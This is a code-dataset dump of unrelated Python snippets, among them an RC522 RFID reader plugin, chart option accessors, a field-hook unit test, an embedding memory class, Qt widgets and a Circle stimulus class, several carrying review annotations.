code stringlengths 281 23.7M |
|---|
class Plugin(plugin.PluginProto):
    """RPIEasy task plugin #211 for the MFRC522 RFID reader over SPI.

    Operation: a 100 ms timer repeatedly re-arms the reader's transmit
    trigger (rc_activate_trigger); when a tag answers, the reader pulls the
    IRQ line low and callback() fires, anti-collides the tag and publishes
    its UID as the task's single text value.
    """

    PLUGIN_ID = 211
    PLUGIN_NAME = 'RFID - RC522'
    PLUGIN_VALUENAME1 = 'Tag'

    def __init__(self, taskindex):
        plugin.PluginProto.__init__(self, taskindex)
        self.dtype = rpieGlobals.DEVICE_TYPE_SPI
        self.vtype = rpieGlobals.SENSOR_TYPE_TEXT
        self.valuecount = 1
        self.senddataoption = True
        self.timeroption = False
        self.timeroptional = False
        self.formulaoption = False
        self.reader = None          # MFRC522 driver instance, created in plugin_init()
        self.lastread = 0           # time.time() of the last accepted tag read (2 s debounce)
        self.readinprogress = 0     # re-entrancy guard for callback()
        self.trigger = 0            # guard so the timer does not re-arm while arming is in progress

    def plugin_init(self, enableplugin=None):
        """(Re)create the MFRC522 reader from the task's SPI/pin settings.

        Requires a valid SPI bus number (self.spi), a reset pin
        (taskdevicepin[0]) and an IRQ pin (taskdevicepin[1]); any missing
        setting disables initialization.
        """
        plugin.PluginProto.plugin_init(self, enableplugin)
        self.decimals[0] = (- 1)  # UID is text, no decimal formatting
        self.initialized = False
        if self.enabled:
            try:
                spil = self.spi
            except:
                spil = (- 1)
            try:
                rstpin = self.taskdevicepin[0]
            except:
                # Missing reset pin makes the whole config unusable.
                rstpin = (- 1)
                spil = (- 1)
            try:
                ipin = self.taskdevicepin[1]
            except:
                # Missing IRQ pin likewise vetoes initialization.
                ipin = (- 1)
                spil = (- 1)
            if (spil > (- 1)):
                try:
                    # Drop any event handler left over from a previous init.
                    gpios.HWPorts.remove_event_detect(int(ipin))
                except:
                    pass
                try:
                    self.reader = MFRC522(bus=spil, device=self.spidnum, pin_rst=rstpin)
                    self.initialized = True
                    self.timer100ms = True
                    self.readinprogress = 0
                    self.trigger = 0
                    self.lastread = 0
                    try:
                        if (ipin > (- 1)):
                            # Tag detection is signalled by a falling edge on IRQ.
                            gpios.HWPorts.add_event_detect(int(ipin), gpios.FALLING, self.callback)
                    except:
                        pass
                    self.rc_clear_irq()
                    misc.addLog(rpieGlobals.LOG_LEVEL_DEBUG, 'RC522 init ok')
                except Exception as e:
                    self.initialized = False
                    misc.addLog(rpieGlobals.LOG_LEVEL_ERROR, ('RC522 init error:' + str(e)))
        if (self.initialized == False):
            self.timer100ms = False

    def timer_ten_per_second(self):
        """Every 100 ms, re-arm the reader unless a read is in progress."""
        if (self.timer100ms and self.initialized and (self.trigger == 0) and (self.readinprogress == 0)):
            self.trigger = 1
            try:
                self.rc_activate_trigger()
            except:
                pass
            self.trigger = 0
        return self.timer100ms

    def callback(self, channel):
        """IRQ-edge handler: try to read a tag UID and publish it.

        Debounced: a UID is only reported if 2 s have passed since the last
        accepted read. On a failed read, sleeps 0.5 s to avoid a tight
        retrigger loop, then clears the IRQ and re-arms the reader.
        """
        if (self.readinprogress == 0):
            self.readinprogress = 1
            if ((time.time() - self.lastread) >= 2):
                id = None
                try:
                    # The first request after an IRQ often misses; retry up to 3x.
                    c = 0
                    while ((not id) and (c < 3)):
                        id = self.rc_read_id_no_block()
                        c += 1
                except Exception as e:
                    id = None
                if (id is not None):
                    self.set_value(1, str(id), True)
                    self.lastread = time.time()
                    self._lastdataservetime = rpieTime.millis()
                else:
                    time.sleep(0.5)
            self.readinprogress = 0
        self.rc_clear_irq()
        if (self.trigger == 0):
            self.rc_activate_trigger()

    def rc_uid_to_num(self, uid):
        """Pack the 5 UID bytes returned by anticollision into one integer."""
        n = 0
        for i in range(0, 5):
            n = ((n * 256) + uid[i])
        return n

    def rc_read_id_no_block(self):
        """Single non-blocking read attempt: REQIDL then anticollision.

        Returns the UID as an int, or None if no tag answered either step.
        """
        (status, TagType) = self.reader.MFRC522_Request(self.reader.PICC_REQIDL)
        if (status != self.reader.MI_OK):
            return None
        (status, uid) = self.reader.MFRC522_Anticoll()
        if (status != self.reader.MI_OK):
            return None
        return self.rc_uid_to_num(uid)

    def rc_activate_trigger(self):
        # Raw register writes that start a new tag-detect transceive cycle.
        # NOTE(review): values look like MFRC522 datasheet registers
        # (0x09 FIFODataReg <- 0x26 REQIDL, 0x01 CommandReg <- Transceive,
        # 0x0D BitFramingReg <- StartSend | 7 bits) — verify against datasheet.
        self.reader.Write_MFRC522(9, 38)
        self.reader.Write_MFRC522(1, 12)
        self.reader.Write_MFRC522(13, 135)

    def rc_clear_irq(self):
        # Clear pending IRQ flags and re-enable the interrupt source.
        # NOTE(review): presumably 0x04 ComIrqReg <- 0x7F, 0x02 ComIEnReg <- 0xA0
        # per the MFRC522 datasheet — confirm.
        self.reader.Write_MFRC522(4, 127)
        self.reader.Write_MFRC522(2, 160)

    def webform_load(self):
        """Render the task's settings form (reset pin + IRQ pin selectors)."""
        webserver.addFormPinSelect('Reset pin (required)', 'taskdevicepin1', self.taskdevicepin[0])
        webserver.addFormNote('Set to an Output pin connected to RC522 reset pin!')
        webserver.addFormPinSelect('IRQ pin (required)', 'taskdevicepin2', self.taskdevicepin[1])
        webserver.addFormNote('Set to an Input-Pullup pin connected to RC522 IRQ pin!')
        return True

    def webform_save(self, params):
        """Persist form values; re-init the plugin only if a pin changed.

        Defaults: reset pin 25, IRQ pin 18 (BCM numbering, presumably).
        """
        changed = False
        par = webserver.arg('taskdevicepin1', params)
        if (par == ''):
            par = 25
        pval = self.taskdevicepin[0]
        self.taskdevicepin[0] = int(par)
        if (pval != self.taskdevicepin[0]):
            changed = True
        par = webserver.arg('taskdevicepin2', params)
        if (par == ''):
            par = 18
        pval = self.taskdevicepin[1]
        self.taskdevicepin[1] = int(par)
        if (pval != self.taskdevicepin[1]):
            changed = True
        if changed:
            self.plugin_init()
        return True

    def plugin_exit(self):
        """Stop the poll timer and mark the plugin torn down."""
        self.initialized = False
        self.timer100ms = False
        return True
class OptionSeriesWaterfallSonificationContexttracksMappingNoteduration(Options):
    """Accessors for ``series.waterfall.sonification.contextTracks.mapping.noteDuration``.

    NOTE(review): in the source dump every setter immediately shadowed its
    identically-named getter, making the getters unreachable — evidently
    stripped ``@property`` / ``@<name>.setter`` decorators. Restored here as
    property pairs with the original bodies; confirm against the generator
    that produced this file.
    """

    @property
    def mapFunction(self):
        """Mapping function; defaults to None (unset)."""
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        """Data property to map to; defaults to None (unset)."""
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        """Upper mapping bound; defaults to None (unset)."""
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        """Lower mapping bound; defaults to None (unset)."""
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        """Range the mapping applies within; defaults to None (unset)."""
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
class OptionSeriesColumnrangeSonificationContexttracksMappingTime(Options):
    """Accessors for ``series.columnrange.sonification.contextTracks.mapping.time``.

    NOTE(review): setters shadowed their identically-named getters in the
    source dump (stripped ``@property`` / ``.setter`` decorators); restored
    as property pairs with the original bodies — confirm against the code
    generator.
    """

    @property
    def mapFunction(self):
        """Mapping function; defaults to None (unset)."""
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        """Data property to map to; defaults to None (unset)."""
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        """Upper mapping bound; defaults to None (unset)."""
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        """Lower mapping bound; defaults to None (unset)."""
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        """Range the mapping applies within; defaults to None (unset)."""
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
class TestUpdateOtherFieldHook(unittest.TestCase):
    """Exercises DummyInstance's field hooks: init/update/delete event hooks,
    mutable vs. frozen fields, and range validation (OutOfRangeHookError).

    The sub-tests share state on self.obj_1/obj_2, so test() runs them in a
    fixed order rather than as independent test methods.
    """

    def setUp(self) -> None:
        # Positional args appear to be: instance_id, input_path, user, owner,
        # region, location, number, counter, pressure[, priority] — inferred
        # from the assertions below; confirm against DummyInstance.
        self.obj_1 = DummyInstance('01', '//fbsource', 'Meta', 'PCI', None, 'Seattle', 6, 7, 8)
        self.obj_2 = DummyInstance('02', '//fbsource', 'Meta', 'PCI', 'west-1', None, 6, 7, 8, 3)

    def test(self) -> None:
        # Order matters: later phases depend on mutations made by earlier ones.
        self._init_event_hook()
        self._mutability()
        self._immutability()
        self._update_event_hook()
        self._delete_event_hook()

    def _mutability(self) -> None:
        """Fields that must accept updates: (field, current value, new values)."""
        mutable_data_obj_1 = (('input_path', '//fbsource', ('//fbcode', '//www')), ('region', None, ('west-1', 'west-2')), ('location', 'Seattle', ('New castle', 'Pike')), ('number', 6, (14, 18, 17)), ('counter', 7, (4, 8, 7)), ('pressure', 8, (24, 28, 27)), ('status', 'start', ('process', 'mid', 'end')))
        mutable_data_obj_2 = (('region', 'west-1', (None, 'west-2')), ('location', None, ('New castle', 'Pike')))
        self._test_mutable_helper(self.obj_1, mutable_data_obj_1)
        self._test_mutable_helper(self.obj_2, mutable_data_obj_2)

    def _test_mutable_helper(self, intance_base_obj: InstanceBase, mutable_data: Tuple) -> None:
        """Assert each field holds its original value, then accepts every new value."""
        for (test_field, original_val, change_vals) in mutable_data:
            with self.subTest('Testing mutability for: ', test_field=test_field):
                self.assertEqual(getattr(intance_base_obj, test_field), original_val)
                for change_val in change_vals:
                    setattr(intance_base_obj, test_field, change_val)
                    self.assertEqual(getattr(intance_base_obj, test_field), change_val)

    def _immutability(self) -> None:
        """Fields that must reject updates with InstanceFrozenFieldError."""
        immutable_data_obj_1 = (('instance_id', '01', '02'), ('user', 'Meta', 'AWS'), ('owner', 'PCI', 'PCS'), ('priority', 1, 3), ('name', 'Tupper01', 'Tupper03'), ('org', 'Measurement_Meta', 'signal'))
        immutable_data_obj_2 = (('priority', 3, 4),)
        self._test_immutable_helper(self.obj_1, immutable_data_obj_1)
        self._test_immutable_helper(self.obj_2, immutable_data_obj_2)

    def _test_immutable_helper(self, intance_base_obj: InstanceBase, immutable_data: Tuple) -> None:
        """Assert each frozen field keeps its value and raises on assignment."""
        for (test_field, original_val, change_vals) in immutable_data:
            with self.subTest('Testing immutability for: ', test_field=test_field):
                self.assertEqual(getattr(intance_base_obj, test_field), original_val)
                with self.assertRaises(InstanceFrozenFieldError):
                    setattr(intance_base_obj, test_field, change_vals)

    def _init_event_hook(self) -> None:
        """Init hooks derive name/org/output_path/storage and range-check numerics."""
        self.assertEqual(self.obj_1.name, 'Tupper01')
        self.assertEqual(self.obj_1.org, 'Measurement_Meta')
        # output_path/storage are derived from input_path by the init hook.
        self.assertEqual(self.obj_1.output_path, '//fbsource:output')
        self.assertEqual(self.obj_1.storage, '//fbsource:storage')
        # Out-of-range numeric args must be rejected at construction time.
        with self.assertRaises(OutOfRangeHookError):
            DummyInstance('01', '//fbsource', 'Meta', 'PCI', 'west-1', 'Seattle', (- 5), 1, 7, 1)
        with self.assertRaises(OutOfRangeHookError):
            DummyInstance('01', '//fbsource', 'Meta', 'PCI', 'west-1', 'Seattle', 5, 16, 57, 3)
        with self.assertRaises(OutOfRangeHookError):
            DummyInstance('01', '//fbsource', 'Meta', 'PCI', 'west-1', 'Seattle', 5, 6, 107, 2)
        with self.assertRaises(OutOfRangeHookError):
            DummyInstance('01', '//fbsource', 'Meta', 'PCI', 'west-1', 'Seattle', 5, 6, 107, 8)

    def _update_event_hook(self) -> None:
        """Update hooks propagate input_path changes, freeze after 'complete',
        enforce numeric ranges, and track highest_pressure as a high-water mark."""
        self.obj_1.input_path = '//www'
        self.assertEqual(self.obj_1.output_path, '//www:output')
        self.assertEqual(self.obj_1.storage, '//www:storage')
        self.obj_1.input_path = '//fbcode'
        self.obj_1.output_path = '//fbsource:output'
        # Setting status to 'complete' appears to freeze the path fields.
        self.obj_1.status = 'complete'
        with self.assertRaises(InstanceFrozenFieldError):
            self.obj_1.input_path = '//www'
        with self.assertRaises(InstanceFrozenFieldError):
            self.obj_1.output_path = '//www:output'
        self.obj_1.number = 28
        with self.assertRaises(OutOfRangeHookError):
            self.obj_1.number = (- 18)
        self.obj_1.counter = 8
        with self.assertRaises(OutOfRangeHookError):
            self.obj_1.counter = 18
        self.obj_1.pressure = (- 98)
        with self.assertRaises(OutOfRangeHookError):
            self.obj_1.pressure = 218
        with self.assertRaises(InstanceFrozenFieldError):
            self.obj_1.priority = 2
        # highest_pressure only moves up, never down.
        self.assertEqual(self.obj_1.highest_pressure, 28)
        self.obj_1.pressure = 70
        self.assertEqual(self.obj_1.highest_pressure, 70)
        self.obj_1.pressure = 5
        self.assertEqual(self.obj_1.highest_pressure, 70)

    def _delete_event_hook(self) -> None:
        """Deleting 'region' removes the attribute and freezes 'location'."""
        self.obj_1.location = 'Kirkland'
        del self.obj_1.region
        with self.assertRaises(AttributeError):
            self.obj_1.region
        with self.assertRaises(InstanceFrozenFieldError):
            self.obj_1.location = 'Bellevue'
class LocalMemory(BaseMemory):
    """In-process vector memory: parallel lists of documents and embeddings.

    Documents are embedded on insertion via ``embedding_provider``; retrieval
    ranks documents by the dot product between the query embedding and the
    stored embedding matrix.
    """

    def __init__(self, embedding_provider: callable):
        # BUGFIX: the original called super(BaseMemory, self).__init__(),
        # which skips BaseMemory itself in the MRO (it initializes the class
        # *after* BaseMemory, i.e. object). Zero-argument super() runs
        # BaseMemory.__init__ as intended.
        # TODO(review): confirm BaseMemory.__init__ takes no required args.
        super().__init__()
        self.docs: List[str] = []                   # stored documents, insertion order
        self.embs: Optional[np.ndarray] = None      # (len(docs), dim) embedding matrix
        self.embedding_provider = embedding_provider

    def __len__(self):
        return len(self.docs)

    def add(self, doc: str, key: Optional[str] = None):
        """Store ``doc``, embedding ``key`` (or the doc itself if key is falsy)."""
        if not key:
            key = doc
        emb = self.embedding_provider(key)
        if self.embs is None:
            # First insertion: promote the vector to a 1-row matrix.
            self.embs = np.expand_dims(emb, 0)
        else:
            self.embs = np.concatenate([self.embs, [emb]], 0)
        self.docs.append(doc)

    def get(self, query: str, k: int):
        """Return up to ``k`` documents most similar to ``query`` (best first)."""
        if self.embs is None:
            return []
        emb = self.embedding_provider(query)
        scores = self.embs.dot(emb)
        # argsort is ascending: take the last k indices, then reverse.
        idxs = np.argsort(scores)[(- k):][::(- 1)]
        return [self.docs[i] for i in idxs]

    def _serialize_embs(self):
        """JSON-friendly dump of the embedding matrix (dtype/data/shape)."""
        if self.embs is None:
            return None
        return {'dtype': self.embs.dtype.name, 'data': self.embs.tolist(), 'shape': self.embs.shape}

    def config(self):
        """Serializable snapshot of this memory, including the provider's config."""
        cfg = super().config()
        cfg.update({'docs': self.docs, 'embs': self._serialize_embs(), 'embedding_provider': self.embedding_provider.config()})
        return cfg

    @classmethod
    def from_config(cls, config):
        """Rebuild a LocalMemory from a config() snapshot.

        BUGFIX: this alternate constructor takes ``cls`` but was missing the
        @classmethod decorator, so calling LocalMemory.from_config(cfg) would
        have treated ``cfg`` as ``self``.
        """
        provider = embedding_provider_from_config(config['embedding_provider'])
        obj = cls(provider)
        obj.docs = config['docs']
        embs = config['embs']
        if embs is not None:
            obj.embs = np.array(embs['data'], dtype=embs['dtype']).reshape(embs['shape'])
        return obj

    def clear(self):
        """Drop all documents and embeddings."""
        self.docs.clear()
        self.embs = None
def extractJstranslations1Com(item):
    """Build a release message for a jstranslations1.com feed item.

    Returns None for previews or items without a chapter/volume, a release
    message when a known tag matches, and False otherwise.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if 'preview' in item['title'].lower() or not (chp or vol):
        return None
    known_groups = [
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    ]
    for tag, series_name, tl_type in known_groups:
        if tag in item['tags']:
            return buildReleaseMessageWithType(item, series_name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
class FilterPopup(QDialog):
    """Borderless always-on-top popup with one checkbox per data-origin filter.

    Emits filterSettingsChanged({filter_id: bool, ...}) whenever a checkbox
    toggles; hides itself as soon as the mouse leaves the popup.
    """

    filterSettingsChanged = Signal(dict)

    def __init__(self, parent, key_defs):
        # Frameless + bypass-WM + stay-on-top makes this behave like a
        # transient dropdown rather than a real dialog.
        QDialog.__init__(self, parent, ((Qt.WindowStaysOnTopHint | Qt.X11BypassWindowManagerHint) | Qt.FramelessWindowHint))
        self.setVisible(False)
        self.filter_items = {}  # filter id -> currently-checked state
        layout = QVBoxLayout()
        layout.setContentsMargins(0, 0, 0, 0)
        frame = QFrame()
        frame.setFrameStyle((QFrame.StyledPanel | QFrame.Raised))
        layout.addWidget(frame)
        self.__layout = QVBoxLayout()
        self.__layout.setSizeConstraint(QLayout.SetFixedSize)
        self.__layout.addWidget(QLabel('Filter by datatype:'))
        # One filter per distinct data_origin found in the key definitions.
        filters = {k['metadata']['data_origin'] for k in key_defs}
        for f in filters:
            self.addFilterItem(f, f)
        frame.setLayout(self.__layout)
        self.setLayout(layout)
        self.adjustSize()

    def addFilterItem(self, name, _id, value=True):
        """Add one checkbox labelled `name`, keyed by `_id`, checked by default."""
        self.filter_items[_id] = value
        check_box = QCheckBox(name)
        check_box.setChecked(value)

        def toggleItem(checked):
            # Closure captures _id; updates state and broadcasts the full map.
            self.filter_items[_id] = checked
            self.filterSettingsChanged.emit(self.filter_items)
        check_box.toggled.connect(toggleItem)
        self.__layout.addWidget(check_box)

    def leaveEvent(self, QEvent):
        # Dismiss on mouse-leave, dropdown style.
        # NOTE(review): delegates to QWidget.leaveEvent rather than
        # QDialog.leaveEvent — presumably intentional, verify.
        QWidget.leaveEvent(self, QEvent)
        self.hide()

    def show(self):
        """Show the popup at the current cursor position."""
        QWidget.show(self)
        p = QCursor().pos()
        self.move(p.x(), p.y())
class OptionPlotoptionsPolygonZones(Options):
    """Accessors for ``plotOptions.polygon.zones`` entries.

    NOTE(review): setters shadowed identically-named getters in the source
    dump (stripped ``@property`` / ``.setter`` decorators); restored as
    property pairs with the original bodies — confirm against the code
    generator.
    """

    @property
    def className(self):
        """CSS class name for the zone; defaults to None (unset)."""
        return self._config_get(None)

    @className.setter
    def className(self, text: str):
        self._config(text, js_type=False)

    @property
    def color(self):
        """Series color inside the zone; defaults to None (unset)."""
        return self._config_get(None)

    @color.setter
    def color(self, text: str):
        self._config(text, js_type=False)

    @property
    def dashStyle(self):
        """Dash style for the graph inside the zone; defaults to None (unset)."""
        return self._config_get(None)

    @dashStyle.setter
    def dashStyle(self, text: str):
        self._config(text, js_type=False)

    @property
    def fillColor(self):
        """Fill color inside the zone; defaults to None (unset)."""
        return self._config_get(None)

    @fillColor.setter
    def fillColor(self, text: str):
        self._config(text, js_type=False)
class Readonly():
    """Base class whose instances reject attribute assignment and deletion.

    Privileged code can still mutate instances through the name-mangled
    __raw_setattr / __raw_delattr class methods, which bypass the guards by
    calling object.__setattr__ / object.__delattr__ directly.

    BUGFIX: the raw helpers take ``(cls, self, ...)`` but were missing the
    @classmethod decorator in the source dump, so they were uncallable as
    written; restored here.
    """

    @classmethod
    def __raw_setattr(cls, self, name, value):
        # Escape hatch: set an attribute despite the readonly guard.
        object.__setattr__(self, name, value)

    @classmethod
    def __raw_delattr(cls, self, name):
        # Escape hatch: delete an attribute despite the readonly guard.
        object.__delattr__(self, name)

    def __setattr__(self, name, value):
        raise TypeError(f'{type(self).__name__} is readonly')

    def __delattr__(self, name):
        raise TypeError(f'{type(self).__name__} is readonly')
def desenha_circulos_recursivos(x, y, raio):
    """Draw a circle at (x, y) on the module-level ``msp`` modelspace
    (layer 'SCAN'), then recurse with half the radius at the four
    compass offsets until the radius drops to 2 or below."""
    msp.add_circle(center=(x, y), radius=raio, dxfattribs={'layer': 'SCAN'})
    if raio <= 2:
        return
    half = raio / 2
    # Same order as the original explicit calls: +x, -x, +y, -y.
    for dx, dy in ((half, 0), (-half, 0), (0, half), (0, -half)):
        desenha_circulos_recursivos(x + dx, y + dy, half)
class Highlight():
    """Config-driven cell/row highlighter for a Qt item-view delegate.

    The config dict supplies lists of rule dicts under 'cells' (match a
    single cell by column + text) and 'rows' (match any cell text in the
    row); each rule can override color, background, alignment and margins.
    compile() normalizes the raw config once; run() is invoked per painted
    cell from the delegate.
    """

    NAME = 'highlight'
    MARGINS = 'margins'
    ALIGNMENT = 'alignment'
    ALIGN_CENTER = 'center'
    ALIGN_HCENTER = 'hcenter'
    ALIGN_VCENTER = 'vcenter'
    COLOR = 'color'
    BGCOLOR = 'bgcolor'
    FONT = 'font'
    CELLS = 'cells'
    ROWS = 'rows'
    COLS = 'cols'
    TEXT = 'text'

    def __init__(self, config):
        self._config = config
        # Cache: row index whose cell texts were last joined, and that blob,
        # so run() rebuilds the row text only when the row changes.
        self._last_visited_row = (- 1)
        self._rowcells = ''

    def compile(self):
        """Normalize the config in place: color strings -> QColor (empty/None
        -> None), alignment name lists -> Qt alignment flags. Returns it."""
        for idx in self._config:
            cells = self._config[idx]
            for cell in cells:
                for item in cell:
                    if (item == Highlight.COLOR) or (item == Highlight.BGCOLOR):
                        if (cell[item] != '') and (cell[item] is not None):
                            cell[item] = QColor(cell[item])
                        else:
                            cell[item] = None
                    if item == Highlight.ALIGNMENT:
                        cell[item] = self.getAlignment(cell[item])
                    if item == Highlight.FONT:
                        self.getFont(cell[item])
        return self._config

    def run(self, args):
        """Apply matching cell/row rules while painting one cell.

        ``args`` is the delegate's positional bundle (painter, option, index,
        style, column count, current row/column, default pen/brush, alignment,
        rect, value). Returns a 1-tuple (modified,) — True when this method
        painted the cell itself.
        """
        painter = args[0]
        option = args[1]
        index = args[2]
        style = args[3]
        modelColumns = args[4]
        curRow = args[5]
        curColumn = args[6]
        defaultPen = args[7]
        defaultBrush = args[8]
        cellAlignment = args[9]
        cellRect = args[10]
        cellValue = args[11]
        modified = False
        cells = self._config.get(Highlight.CELLS)
        rows = self._config.get(Highlight.ROWS)
        if cells:
            for cell in cells:
                if curColumn not in cell[Highlight.COLS]:
                    continue
                if cellValue not in cell[Highlight.TEXT]:
                    continue
                cellColor = cell.get(Highlight.COLOR)
                cellBgColor = cell.get(Highlight.BGCOLOR)
                if cell.get(Highlight.ALIGNMENT) is not None:
                    cellAlignment = cell[Highlight.ALIGNMENT]
                if cell.get(Highlight.MARGINS) is not None:
                    # NOTE(review): self.HMARGIN / self.VMARGIN are not defined
                    # in this class — presumably supplied by a subclass/mixin;
                    # verify before relying on margin rules.
                    cellRect.adjust(int(cell[Highlight.MARGINS][self.HMARGIN]), int(cell[Highlight.MARGINS][self.VMARGIN]), (- defaultPen.width()), (- defaultPen.width()))
                modified = True
                self.paintCell(style, painter, option, defaultPen, cellAlignment, cellRect, cellColor, cellBgColor, cellValue)
        # BUGFIX: a config with no 'rows' key yielded rows=None and the
        # original len(rows) raised TypeError; treat missing the same as empty
        # (mirrors the `if cells:` guard above).
        if not rows:
            return (modified,)
        if curRow != self._last_visited_row:
            # Join every cell in the row once, for substring matching below.
            self._rowcells = ' '.join([index.sibling(curRow, col).data() for col in range(0, modelColumns)])
            self._last_visited_row = curRow
        for row in rows:
            skip = True
            for text in row[Highlight.TEXT]:
                if text in self._rowcells:
                    skip = False
            if skip:
                continue
            cellColor = row.get(Highlight.COLOR)
            cellBgColor = row.get(Highlight.BGCOLOR)
            if row.get(Highlight.ALIGNMENT) is not None:
                cellAlignment = row[Highlight.ALIGNMENT]
            if row.get(Highlight.MARGINS) is not None:
                cellRect.adjust(int(row[Highlight.MARGINS][self.HMARGIN]), int(row[Highlight.MARGINS][self.VMARGIN]), (- defaultPen.width()), (- defaultPen.width()))
            modified = True
            self.paintCell(style, painter, option, defaultPen, cellAlignment, cellRect, cellColor, cellBgColor, cellValue)
        return (modified,)

    def paintCell(self, style, painter, option, defaultPen, cellAlignment, cellRect, cellColor, cellBgColor, cellValue):
        """Paint one cell's background and text with the rule's overrides.

        Background/foreground overrides are skipped for selected cells so the
        selection highlight stays visible.
        """
        cellSelected = (option.state & QStyle.State_Selected)
        painter.save()
        if not cellSelected:
            if cellBgColor is not None:
                painter.fillRect(option.rect, cellBgColor)
            if cellColor is not None:
                defaultPen.setColor(cellColor)
        painter.setPen(defaultPen)
        style.drawItemText(painter, cellRect, cellAlignment, option.palette, True, cellValue)
        painter.restore()

    def getAlignment(self, alignments):
        """OR the configured alignment names into Qt flags; None if none match."""
        alignFlags = 0
        for align in alignments:
            if align == Highlight.ALIGN_CENTER:
                alignFlags |= QtCore.Qt.AlignCenter
            elif align == Highlight.ALIGN_HCENTER:
                alignFlags |= QtCore.Qt.AlignHCenter
            elif align == Highlight.ALIGN_VCENTER:
                alignFlags |= QtCore.Qt.AlignVCenter
        if alignFlags == 0:
            return None
        return alignFlags

    def getFont(self, font):
        # Placeholder: font rules are accepted in config but not applied yet.
        pass
class Circle(Ellipse):
    """A circle stimulus: an Ellipse with both radii equal.

    NOTE(review): in the source dump the ``radius`` setter shadowed the
    identically-named getter (stripped ``@property`` / ``.setter``
    decorators); restored here as a property pair with the original bodies.
    """

    _getter_exception_message = 'Cannot set {0} if surface exists!'

    def __init__(self, radius, colour=None, line_width=None, position=None, anti_aliasing=None):
        """Create a circle.

        Any of colour/line_width/position/anti_aliasing left as None falls
        back to the module defaults. line_width must satisfy
        0 <= line_width < radius (0 means filled).
        """
        self._radius = radius
        if position is None:
            position = defaults.circle_position
        if colour is None:
            colour = defaults.circle_colour
        if line_width is None:
            line_width = defaults.circle_line_width
        elif (line_width < 0) or (line_width >= self._radius):
            raise AttributeError('line_width must be >= 0 and < radius!')
        if anti_aliasing is not None:
            self._anti_aliasing = anti_aliasing
        else:
            self._anti_aliasing = defaults.circle_anti_aliasing
        Ellipse.__init__(self, [radius, radius], colour, line_width, position, anti_aliasing)

    @property
    def radius(self):
        """Getter for radius."""
        return self._radius

    @radius.setter
    def radius(self, value):
        """Setter for radius; rejected once the stimulus surface exists."""
        if self.has_surface:
            raise AttributeError(Circle._getter_exception_message.format('radius'))
        else:
            self._radius = value

    def get_polar_coordiantes(self):
        # Deliberately raises; kept (typo included) for backward compatibility.
        raise DeprecationWarning(('get_polar_coordiantes is obsolete. ' + 'Please use the property polar_position'))

    def set_polar_coordinates(self, radial, angle_in_degrees):
        # Deliberately raises; kept for backward compatibility.
        raise DeprecationWarning(('set_polar_coordinates is obsolete. ' + 'Please use the property polar_position'))

    def overlapping_with_circle(self, other, minimal_gap=0):
        """True if the two circles overlap with less than minimal_gap between them."""
        d = self.distance(other)
        return ((d - minimal_gap) <= (other._radius + self._radius))

    def center_inside_circle(self, other):
        """True if this circle's center lies inside ``other``."""
        d = self.distance(other)
        return (d <= other._radius)

    def inside_circle(self, other):
        """True if this circle lies entirely inside ``other``."""
        d = self.distance(other)
        return (d <= (other._radius - self._radius))
def _demo(exp=None):
    """Module demo: present a single anti-aliased circle of radius 100.

    When ``exp`` is None, a throw-away experiment is initialized in develop
    mode (with event logging off) and the display is held for one second.
    """
    if exp is None:
        from .. import control
        control.set_develop_mode(True)
        control.defaults.event_logging = 0
        exp_ = control.initialize()
    dot = Circle(radius=100, anti_aliasing=10)
    dot.present()
    if exp is None:
        exp_.clock.wait(1000)
def drives_for_iostandard(iostandard):
    """Return the list of valid drive strengths (mA) for an I/O standard.

    SSTL-family standards have no selectable drive and yield ['_FIXED'];
    any other standard is considered unreachable.
    """
    if iostandard in ('LVCMOS18', 'LVCMOS15'):
        return [2, 4, 6, 8, 12, 16]
    if iostandard == 'LVCMOS12':
        return [2, 4, 6, 8]
    if iostandard in (SSTL + DIFF_SSTL):
        return ['_FIXED']
    assert False, 'this line should be unreachable'
def generate_mod():
    """GUI action: extract the selected BLARC (if any), then copy every file
    from the chosen BLYT folder (flattened) into <output_folder>/blyt.

    Reads module-level state set by the UI: output_folder, blarc_file_path,
    blyt_folder, status_label; reports progress via status_label/stdout.
    """
    if not output_folder:
        status_label.config(text='Error: Please select the output folder.')
        return
    if blarc_file_path:
        # Run the sibling extract.py as a subprocess against the BLARC file.
        script_dir = os.path.dirname(os.path.abspath(__file__))
        extract_script_path = os.path.join(script_dir, 'extract.py')
        try:
            subprocess.run(['python', extract_script_path, blarc_file_path, output_folder], check=True)
            print('Extraction completed successfully.')
        except subprocess.CalledProcessError as e:
            print('Extraction failed:', e)
    else:
        print('No BLARC file selected.')
    # NOTE(review): calculate_ratio() is called twice and neither result
    # (scaling_factor, ratio) is used below — dead code unless
    # calculate_ratio has side effects; confirm and clean up.
    scaling_factor = calculate_ratio()
    if not blyt_folder:
        status_label.config(text='Error: Please select the BLYT folder.')
        return
    ratio = calculate_ratio()
    if not os.path.isdir(blyt_folder):
        status_label.config(text='Error: Invalid BLYT folder.')
        return
    destination_blyt_folder = os.path.join(output_folder, 'blyt')
    os.makedirs(destination_blyt_folder, exist_ok=True)
    # Walk recursively but flatten: every file lands directly in blyt/
    # (same-named files in different subfolders overwrite each other).
    for (root, _, files) in os.walk(blyt_folder):
        for file in files:
            source_path = os.path.join(root, file)
            destination_path = os.path.join(destination_blyt_folder, file)
            copy2(source_path, destination_path)
    status_label.config(text='Output created successfully.')
